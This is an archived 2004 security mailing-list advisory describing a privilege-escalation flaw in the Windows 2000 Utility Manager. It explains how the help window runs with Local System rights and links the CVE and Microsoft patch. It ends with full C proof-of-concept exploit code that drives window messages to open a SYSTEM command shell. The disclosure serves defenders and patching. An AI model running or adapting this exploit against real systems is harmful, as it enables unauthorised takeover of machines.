[VulnWatch] [SHATTER Team Security Alert] Microsoft Windows Utility Manager Vulnerability

From: Vivek Rathod (Application Security, Inc.) (vrathod_at_appsecinc.com)
Date: 04/15/04

  • Next message: spiffomatic 64: "[Full-Disclosure] SCT javascript execution vulnerability"
    Date: Thu, 15 Apr 2004 11:45:52 -0400
    To: bugtraq@securityfocus.com, full-disclosure@lists.netsys.com, vulnwatch@vulnwatch.org
    
    
    

    Microsoft Windows Utility Manager Vulnerability

    April 13, 2004

    Risk Level: High

    Summary:
    A local elevation of privileges vulnerability exists on the Windows Utility
    Manager that allows to any user to take complete control over the operating
    system.

    Versions Affected:
    All products in the Windows 2000 operating system family.

    Details:
    Microsoft Windows 2000 contains support for Accessibility options within
    the
    operating system. Accessibility support is a series of assistive
    technologies
    within Windows that allow users with disabilities to still be able to
    access the
    functions of the operating system. Accessibility support is enabled or
    disabled
    through shortcuts built into the operating system, or through the
    Accessibility
    Utility Manager. The Utility Manager is an accessibility utility that
    allows
    users to check the status of Accessibility programs (Magnifier,
    Narrator, On-
    Screen Keyboard) and start or stop them. The Utility Manager can be
    invoked by
    pressing Windows Key + U or executing "utilman.exe /start" from the command
    line. The Utility Manager Service is enabled by default and runs in the
    interactive desktop with Local System privileges.

    The Utility Manager has support for context sensitive help. Users can
    access
    this by clicking in the "?" on the title bar and then on an object or by
    pressing the F1 key after selecting an object. In order to display the
    help,
    Utility Manager loads winhlp32.exe but does not drop System privileges.
    Therefore, winhlp32.exe is executed under the Local System account. While
    winhlp32.exe is executing it is possible to send Windows messages to it and
    attack it with "Shatter" style attacks.

    Winhlp32.exe is executed with its main window hidden but it is very
    trivial to
    make it visible. Once the window is made visible, a typical attack would
    involve using the “File Open” dialog to execute a program such as
    “cmd.exe.”
    Since the Help window has Local System privileges, the executed program
    will
    have the same privileges.

    Further information is available at:
    http://www.appsecinc.com/resources/alerts/general/04-0001.html
    http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2003-0908
    http://www.microsoft.com/technet/security/bulletin/ms04-011.mspx

    Fix:
    http://www.microsoft.com/downloads/details.aspx?FamilyId=0692C27E-F63A-414C-B3EB-D2342FBB6C00&displaylang=en

    Acknowledgments:
    Thanks to Cesar Cerrudo and Esteban Martinez Fayo of Application
    Security, Inc. (http://www.appsecinc.com) and to
    Brett Moore of Security-Assessment.com (http://security-assessment.com).

    Please find the proof-of-concept exploit code attached

    ___________________________________________
    AppSecInc Team SHATTER
    Tel: 1-866-927-7732
    E-mail: shatter@appsecinc.com
    Web: www.appsecinc.com

    Application Security, Inc.
    "Securing Business by Securing Enterprise Applications"

    
    

    // By Cesar Cerrudo (cesar@appsecinc.com)
    // Local elevation of priviliges exploit for Windows Utility Manager
    // Gives you a shell with system privileges
    // If you have problems try changing Sleep() values.

    #include <stdio.h>
    #include <windows.h>
    #include <commctrl.h>
    #include <Winuser.h>

    int main(int argc, char *argv[])
    {
      HWND lHandle, lHandle2;
      POINT point;

      char sText[]="%windir%\\system32\\cmd.ex?";

      // run utility manager
      system("utilman.exe /start");
      Sleep(500);

      // execute contextual help
      SendMessage(FindWindow(NULL, "Utility manager"), 0x4D, 0, 0);
      Sleep(500);

      // open file open dialog windown in Windows Help
      PostMessage(FindWindow(NULL, "Windows Help"), WM_COMMAND, 0x44D, 0);
      Sleep(500);

      // find open file dialog window
      lHandle = FindWindow("#32770","Open");

      // get input box handle
      lHandle2 = GetDlgItem(lHandle, 0x47C);
      Sleep(500);

      // set text to filter listview to display only cmd.exe
      SendMessage (lHandle2, WM_SETTEXT, 0, (LPARAM)sText);
      Sleep(800);

      // send return
      SendMessage (lHandle2, WM_IME_KEYDOWN, VK_RETURN, 0);

      //get navigation bar handle
      lHandle2 = GetDlgItem(lHandle, 0x4A0);
      //send tab
      SendMessage (lHandle2, WM_IME_KEYDOWN, VK_TAB, 0);
      Sleep(500);
      lHandle2 = FindWindowEx(lHandle,NULL,"SHELLDLL_DefView", NULL);
      //get list view handle
      lHandle2 = GetDlgItem(lHandle2, 0x1);

      SendMessage (lHandle2, WM_IME_KEYDOWN, 0x43, 0); // send "c" char
      SendMessage (lHandle2, WM_IME_KEYDOWN, 0x4D, 0); // send "m" char
      SendMessage (lHandle2, WM_IME_KEYDOWN, 0x44, 0); // send "d" char
      Sleep(500);
      
      // popup context menu
      PostMessage (lHandle2, WM_CONTEXTMENU, 0, 0);
      Sleep(1000);

      // get context menu handle
      point.x =10; point.y =30;
      lHandle2=WindowFromPoint(point);

      SendMessage (lHandle2, WM_KEYDOWN, VK_DOWN, 0); // move down in menu
      SendMessage (lHandle2, WM_KEYDOWN, VK_DOWN, 0); // move down in menu
      SendMessage (lHandle2, WM_KEYDOWN, VK_RETURN, 0); // send return

      SendMessage (lHandle, WM_CLOSE,0,0); // close open file dialog window

      return(0);
    }


  • Next message: spiffomatic 64: "[Full-Disclosure] SCT javascript execution vulnerability"

    Relevant Pages